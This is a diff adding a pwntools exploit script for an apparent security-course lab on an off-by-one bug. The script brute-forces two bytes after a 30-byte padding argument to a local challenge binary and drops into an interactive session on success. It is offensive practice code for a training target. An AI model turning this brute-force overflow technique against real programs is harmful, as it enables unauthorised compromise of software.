lab 4d - off by one vuln

4d/lab4d_2.py

@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template /challenge/run
+from pwn import *
+
+# Set up pwntools for the correct architecture
+exe = context.binary = ELF(args.EXE or '/challenge/run')
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args".  For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+
+
+
+def start(argv=[], *a, **kw):
+    '''Start the exploit against the target.'''
+    if args.GDB:
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
+    else:
+        return process([exe.path] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript = '''
+tbreak main
+continue
+'''.format(**locals())
+
+#===========================================================
+#                    EXPLOIT GOES HERE
+#===========================================================
+# Arch:     amd64-64-little
+# RELRO:    No RELRO
+# Stack:    No canary found
+# NX:       NX unknown - GNU_STACK missing
+# PIE:      No PIE (0x400000)
+# Stack:    Executable
+# RWX:      Has RWX segments
+
+# create inputs
+    # send in input
+    # check if process prints "Good" then cat the flag and print the results.
+
+for x in range(1, 255):
+    for y in range(1, 255):
+        print(repr("A" * 30 + chr(x) + chr(y)))
+        io = start([("A" * 30) + chr(x) + chr(y)])
+        try:
+            io.readline()
+            io.readline()
+            io.readline()
+            nxtline = io.readline()
+            if nxtline.startswith(b"Good job!"):
+                io.interactive()
+            else:
+                io.close()
+        except:
+            io.close()